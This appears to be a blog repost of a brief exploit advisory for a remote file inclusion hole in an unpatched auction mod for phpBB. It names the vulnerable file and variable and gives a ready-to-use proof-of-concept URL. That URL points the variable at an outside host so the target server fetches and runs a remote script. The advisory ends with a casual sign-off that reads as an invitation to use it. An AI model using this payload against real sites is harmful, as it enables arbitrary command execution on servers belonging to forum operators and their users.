phpBB auction mod - Remote File Inclusion Vuln
===================================
developer's site: http://www.phpbb-auction.com
script: Auction mod for phpBB
risk: critical
status: unpatched
discovered by: VietMafia
===================================
Vuln. Description:
This flaw is due to an input validation error in the "aution\auction_common.php"(line 26)
that does not validate the "$phpbb_root_path" variable properly. Remote attackers can include
malicious scripts and execute arbitrary commands with the privileges of the web server
PoC:
http://[target]/[path]/aution\auction_common.php?
phpbb_root_path=http://unsecured-systems.com/forum/
===================================
have a good time all my friends
===================================
0 Comments:
Post a Comment
<< Home